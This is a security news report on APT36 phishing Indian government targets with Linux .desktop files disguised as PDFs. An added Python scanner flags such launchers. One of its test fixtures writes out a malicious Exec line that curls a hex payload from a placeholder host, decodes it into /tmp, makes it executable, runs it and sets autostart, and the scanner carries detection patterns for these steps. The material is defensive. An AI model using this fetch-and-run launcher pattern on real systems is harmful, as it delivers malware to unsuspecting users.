APT36 Hackers Use Linux .desktop Files to Deploy Malware in Latest Campaign

Summary
– APT36 is using malicious Linux .desktop files to target Indian government and defense entities for data exfiltration and persistent espionage.
– The attacks involve phishing emails with ZIP archives containing disguised .desktop files that execute hidden bash commands to fetch and run malware.
– The malware uses a hex-encoded payload from attacker-controlled servers or Google Drive and launches a decoy PDF to avoid suspicion.
– A Go-based ELF payload establishes persistence via cron jobs or systemd and communicates with a command server through a WebSocket channel.
– This campaign demonstrates APT36’s evolving tactics toward greater sophistication and evasion of Linux security tools.
A sophisticated cyber espionage campaign targeting Indian government and defense sectors has been uncovered, abusing Linux .desktop files to deploy malware. Security firms CYFIRMA and CloudSEK have both documented this ongoing operation, which began in early August and continues to pose a significant threat to sensitive networks.
The attackers, identified as the Pakistani-linked group APT36, distribute phishing emails containing ZIP archives. Inside these archives, a malicious .desktop file is disguised as a PDF document, complete with a deceptive filename meant to trick users into opening it. These files, normally harmless application launchers in Linux environments, are weaponized to execute hidden commands.
When an unsuspecting user opens the file, the bash command embedded in its ‘Exec=’ field runs. This command retrieves a hex-encoded payload from a remote server, often hosted on Google Drive, and saves it to a temporary directory. The script then modifies the file’s permissions to make it executable and runs it discreetly in the background.
To avoid raising suspicion, the malware simultaneously launches Firefox to display a harmless decoy PDF, making the attack appear legitimate. Additional fields like ‘Terminal=false’ ensure no terminal window appears, while ‘X-GNOME-Autostart-enabled=true’ attempts to establish persistence by running the malicious file at every login.
This abuse of .desktop files mirrors how Windows LNK shortcuts have been exploited in the past. Because these files are plain-text and rarely flagged by security tools, they provide an effective method for delivering malware without detection.
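Because a .desktop launcher is plain text in the freedesktop key/value format, the indicators described above (a shell wrapper in ‘Exec=’, a download plus decode plus chmod chain, a temporary-directory path, backgrounding, ‘Terminal=false’, ‘X-GNOME-Autostart-enabled=true’ and a document-like name) can be checked directly by a scanner. The following Python is an added example of such a scanner and is not code from the article, from CYFIRMA or from CloudSEK; the two embedded launcher texts are constructed fixtures (the suspicious one uses the placeholder domain example.invalid and mirrors only the behaviour the article describes), and the indicator names and the threshold of three are arbitrary choices.

```python
import re
import sys

# Constructed fixture modelled on the behaviour the article describes.
# The domain is a placeholder, not a real indicator of compromise.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Report.pdf
Icon=application-pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -s https://example.invalid/p.hex | xxd -r -p > /tmp/.svc; chmod +x /tmp/.svc; /tmp/.svc & firefox /tmp/decoy.pdf"
"""

# Constructed fixture of an ordinary application launcher.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
Terminal=false
Categories=Utility;TextEditor;
"""


def parse_desktop_entry(text):
    """Return the key/value pairs of the [Desktop Entry] group.

    Other groups such as [Desktop Action ...] are ignored; comments and
    blank lines are skipped. Values are split on the first '=' only, so an
    Exec line containing '=' inside a URL stays intact.
    """
    entry = {}
    in_main = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_main = line == "[Desktop Entry]"
            continue
        if in_main and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


# Indicator name and the regex applied to the Exec value (names are ours).
EXEC_INDICATORS = [
    ("shell_wrapper", r"\b(ba)?sh\s+-c\b"),
    ("network_fetch", r"\b(curl|wget)\b"),
    ("payload_decode", r"\b(xxd\s+-r|base64\s+(-d|--decode))\b"),
    ("chmod_exec", r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7[0-7]*\b"),
    ("temp_path", r"/tmp/|/dev/shm/|/var/tmp/"),
    # A lone '&' (not '&&') or nohup/setsid: command sent to the background.
    ("background_exec", r"(?<!&)&(?!&)|\bnohup\b|\bsetsid\b"),
]


def score_desktop_entry(entry, filename=""):
    """Return the list of indicator names that fire for one parsed entry."""
    findings = []
    exec_cmd = entry.get("Exec", "")
    for name, pattern in EXEC_INDICATORS:
        if re.search(pattern, exec_cmd):
            findings.append(name)
    # Launcher pretending to be a document, by file name or displayed Name.
    if filename.lower().endswith(".pdf.desktop") or re.search(
        r"\.(pdf|docx?|xlsx?)$", entry.get("Name", ""), re.I
    ):
        findings.append("document_lookalike")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("autostart")
    # Shell wrapper with the terminal suppressed: nothing visible to the user.
    if entry.get("Terminal", "").lower() == "false" and "shell_wrapper" in findings:
        findings.append("hidden_terminal_shell")
    return findings


def is_suspicious(text, filename="", threshold=3):
    """True when at least `threshold` indicators fire (threshold is arbitrary)."""
    return len(score_desktop_entry(parse_desktop_entry(text), filename)) >= threshold


def scan_file(path):
    """Parse a .desktop file from disk and return its findings."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return score_desktop_entry(parse_desktop_entry(fh.read()), path)


if __name__ == "__main__":
    # Usage: python scan_desktop.py ~/.config/autostart/*.desktop
    # Without arguments the two constructed fixtures are scored instead.
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, scan_file(p))
    else:
        print("suspicious:", score_desktop_entry(parse_desktop_entry(SUSPICIOUS_DESKTOP), "Report.pdf.desktop"))
        print("benign:    ", score_desktop_entry(parse_desktop_entry(BENIGN_DESKTOP), "editor.desktop"))
```

Pointing the scanner at user autostart directories and at Desktop or Downloads folders catches the persistence and the initial lure respectively; a single indicator (a legitimate launcher can use ‘sh -c’ or write to /tmp) should raise the score, not alarm on its own, which is why the decision is made on a count.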
The payload delivered in this campaign is a Go-based ELF executable designed for espionage. Despite being packed and obfuscated to hinder analysis, researchers confirmed its capabilities include hiding its presence, establishing persistence via cron jobs or systemd services, and communicating with a command-and-control server through a bidirectional WebSocket channel. This allows both data exfiltration and remote command execution.
This latest activity demonstrates APT36’s continued evolution toward more evasive and sophisticated attack methods, highlighting the need for increased vigilance around seemingly innocent file types in Linux environments.
(Source: Bleeping Computer)